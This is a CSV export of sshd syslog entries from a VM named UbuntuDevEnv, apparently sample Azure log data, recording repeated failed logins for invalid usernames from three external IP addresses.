+4412,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:24:55,UbuntuDevEnv,2019-06-26 14:24:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,8122,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4413,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:24:57,UbuntuDevEnv,2019-06-26 14:24:57,auth,UbuntuDevEnv,info,Failed password for invalid user webprog from 220.134.138.111 port 53224 ssh2,8122,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webprog,220.134.138.1,53224,,
+4414,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:24:57,UbuntuDevEnv,2019-06-26 14:24:57,auth,UbuntuDevEnv,info,Disconnected from invalid user webprog 220.134.138.111 port 53224 [preauth],8122,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webprog,220.134.138.1,53224,,
+4415,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:24:57,UbuntuDevEnv,2019-06-26 14:24:57,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 53224:11: Bye Bye [preauth],8122,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,53224,,
+4416,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:25:21,UbuntuDevEnv,2019-06-26 14:25:20,auth,UbuntuDevEnv,info,Invalid user fmaster from 196.46.36.144 port 54309,8216,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fmaster,196.46.36.1,54309,,
+4417,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:25:21,UbuntuDevEnv,2019-06-26 14:25:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,8216,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+4418,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:25:21,UbuntuDevEnv,2019-06-26 14:25:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,8216,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4419,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:25:22,UbuntuDevEnv,2019-06-26 14:25:21,auth,UbuntuDevEnv,info,Failed password for invalid user fmaster from 196.46.36.144 port 54309 ssh2,8216,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fmaster,196.46.36.1,54309,,
+4420,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:25:22,UbuntuDevEnv,2019-06-26 14:25:22,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 54309:11: Bye Bye [preauth],8216,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,54309,,
+4421,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:25:22,UbuntuDevEnv,2019-06-26 14:25:22,auth,UbuntuDevEnv,info,Disconnected from invalid user fmaster 196.46.36.144 port 54309 [preauth],8216,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fmaster,196.46.36.1,54309,,
+4422,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:25:53,UbuntuDevEnv,2019-06-26 14:25:52,auth,UbuntuDevEnv,info,Invalid user msda from 68.183.50.149 port 56420,8334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,msda,68.183.50.1,56420,,
+4423,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:25:53,UbuntuDevEnv,2019-06-26 14:25:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,8334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4424,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:25:53,UbuntuDevEnv,2019-06-26 14:25:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,8334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+4425,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:25:54,UbuntuDevEnv,2019-06-26 14:25:54,auth,UbuntuDevEnv,info,Failed password for invalid user msda from 68.183.50.149 port 56420 ssh2,8334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,msda,68.183.50.1,56420,,
+4426,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:25:55,UbuntuDevEnv,2019-06-26 14:25:54,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 56420:11: Bye Bye [preauth],8334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,56420,,
+4427,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:25:55,UbuntuDevEnv,2019-06-26 14:25:54,auth,UbuntuDevEnv,info,Disconnected from invalid user msda 68.183.50.149 port 56420 [preauth],8334,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,msda,68.183.50.1,56420,,
+4428,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:26:39,UbuntuDevEnv,2019-06-26 14:26:38,auth,UbuntuDevEnv,info,Invalid user admin from 220.134.138.111 port 42082,8496,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,220.134.138.1,42082,,
+4429,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:26:39,UbuntuDevEnv,2019-06-26 14:26:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,8496,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4430,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:26:39,UbuntuDevEnv,2019-06-26 14:26:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,8496,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4431,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:26:41,UbuntuDevEnv,2019-06-26 14:26:41,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 220.134.138.111 port 42082 ssh2,8496,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,220.134.138.1,42082,,
+4432,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:26:41,UbuntuDevEnv,2019-06-26 14:26:41,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 42082:11: Bye Bye [preauth],8496,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,42082,,
+4433,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:26:41,UbuntuDevEnv,2019-06-26 14:26:41,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 220.134.138.111 port 42082 [preauth],8496,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,220.134.138.1,42082,,
+4434,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:27:23,UbuntuDevEnv,2019-06-26 14:27:23,auth,UbuntuDevEnv,info,Invalid user xiaojie from 68.183.50.149 port 45136,8662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xiaojie,68.183.50.1,45136,,
+4435,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:27:23,UbuntuDevEnv,2019-06-26 14:27:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,8662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4436,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:27:23,UbuntuDevEnv,2019-06-26 14:27:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,8662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+4437,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:27:26,UbuntuDevEnv,2019-06-26 14:27:25,auth,UbuntuDevEnv,info,Failed password for invalid user xiaojie from 68.183.50.149 port 45136 ssh2,8662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xiaojie,68.183.50.1,45136,,
+4438,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:27:26,UbuntuDevEnv,2019-06-26 14:27:25,auth,UbuntuDevEnv,info,Disconnected from invalid user xiaojie 68.183.50.149 port 45136 [preauth],8662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xiaojie,68.183.50.1,45136,,
+4439,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:27:26,UbuntuDevEnv,2019-06-26 14:27:25,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 45136:11: Bye Bye [preauth],8662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,45136,,
+4440,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:28:09,UbuntuDevEnv,2019-06-26 14:28:08,auth,UbuntuDevEnv,info,Invalid user ip from 196.46.36.144 port 34243,8810,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ip,196.46.36.1,34243,,
+4441,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:28:09,UbuntuDevEnv,2019-06-26 14:28:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,8810,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+4442,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:28:09,UbuntuDevEnv,2019-06-26 14:28:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,8810,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4443,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:28:12,UbuntuDevEnv,2019-06-26 14:28:11,auth,UbuntuDevEnv,info,Failed password for invalid user ip from 196.46.36.144 port 34243 ssh2,8810,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ip,196.46.36.1,34243,,
+4444,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:28:12,UbuntuDevEnv,2019-06-26 14:28:11,auth,UbuntuDevEnv,info,Disconnected from invalid user ip 196.46.36.144 port 34243 [preauth],8810,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ip,196.46.36.1,34243,,
+4445,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:28:12,UbuntuDevEnv,2019-06-26 14:28:11,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 34243:11: Bye Bye [preauth],8810,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,34243,,
+4446,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:28:27,UbuntuDevEnv,2019-06-26 14:28:26,auth,UbuntuDevEnv,info,Invalid user doom from 220.134.138.111 port 59178,8878,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,doom,220.134.138.1,59178,,
+4447,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:28:27,UbuntuDevEnv,2019-06-26 14:28:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,8878,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4448,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:28:27,UbuntuDevEnv,2019-06-26 14:28:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,8878,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4449,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:28:29,UbuntuDevEnv,2019-06-26 14:28:28,auth,UbuntuDevEnv,info,Failed password for invalid user doom from 220.134.138.111 port 59178 ssh2,8878,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,doom,220.134.138.1,59178,,
+4450,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:28:29,UbuntuDevEnv,2019-06-26 14:28:29,auth,UbuntuDevEnv,info,Disconnected from invalid user doom 220.134.138.111 port 59178 [preauth],8878,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,doom,220.134.138.1,59178,,
+4451,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:28:29,UbuntuDevEnv,2019-06-26 14:28:29,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 59178:11: Bye Bye [preauth],8878,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,59178,,
+4452,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:28:52,UbuntuDevEnv,2019-06-26 14:28:52,auth,UbuntuDevEnv,info,Invalid user eric from 68.183.50.149 port 33852,8971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eric,68.183.50.1,33852,,
+4453,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:28:52,UbuntuDevEnv,2019-06-26 14:28:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,8971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+4454,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:28:52,UbuntuDevEnv,2019-06-26 14:28:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,8971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4455,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:28:54,UbuntuDevEnv,2019-06-26 14:28:53,auth,UbuntuDevEnv,info,Failed password for invalid user eric from 68.183.50.149 port 33852 ssh2,8971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eric,68.183.50.1,33852,,
+4456,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:28:54,UbuntuDevEnv,2019-06-26 14:28:53,auth,UbuntuDevEnv,info,Disconnected from invalid user eric 68.183.50.149 port 33852 [preauth],8971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eric,68.183.50.1,33852,,
+4457,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:28:54,UbuntuDevEnv,2019-06-26 14:28:53,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 33852:11: Bye Bye [preauth],8971,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,33852,,
+4458,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:30:16,UbuntuDevEnv,2019-06-26 14:30:16,auth,UbuntuDevEnv,info,Invalid user amine from 220.134.138.111 port 48042,9299,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amine,220.134.138.1,48042,,
+4459,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:30:16,UbuntuDevEnv,2019-06-26 14:30:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,9299,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4460,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:30:16,UbuntuDevEnv,2019-06-26 14:30:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,9299,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4461,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:30:19,UbuntuDevEnv,2019-06-26 14:30:18,auth,UbuntuDevEnv,info,Failed password for invalid user amine from 220.134.138.111 port 48042 ssh2,9299,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amine,220.134.138.1,48042,,
+4462,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:30:19,UbuntuDevEnv,2019-06-26 14:30:18,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 48042:11: Bye Bye [preauth],9299,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,48042,,
+4463,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:30:19,UbuntuDevEnv,2019-06-26 14:30:18,auth,UbuntuDevEnv,info,Disconnected from invalid user amine 220.134.138.111 port 48042 [preauth],9299,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amine,220.134.138.1,48042,,
+4464,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:30:21,UbuntuDevEnv,2019-06-26 14:30:21,auth,UbuntuDevEnv,info,Invalid user rding from 68.183.50.149 port 50808,9320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rding,68.183.50.1,50808,,
+4465,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:30:21,UbuntuDevEnv,2019-06-26 14:30:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,9320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+4466,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:30:21,UbuntuDevEnv,2019-06-26 14:30:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,9320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4467,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:30:23,UbuntuDevEnv,2019-06-26 14:30:22,auth,UbuntuDevEnv,info,Failed password for invalid user rding from 68.183.50.149 port 50808 ssh2,9320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rding,68.183.50.1,50808,,
+4468,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:30:23,UbuntuDevEnv,2019-06-26 14:30:22,auth,UbuntuDevEnv,info,Disconnected from invalid user rding 68.183.50.149 port 50808 [preauth],9320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rding,68.183.50.1,50808,,
+4469,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:30:23,UbuntuDevEnv,2019-06-26 14:30:22,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 50808:11: Bye Bye [preauth],9320,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,50808,,
+4470,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:30:48,UbuntuDevEnv,2019-06-26 14:30:48,auth,UbuntuDevEnv,info,Invalid user dui from 196.46.36.144 port 42410,9466,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dui,196.46.36.1,42410,,
+4471,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:30:48,UbuntuDevEnv,2019-06-26 14:30:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,9466,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
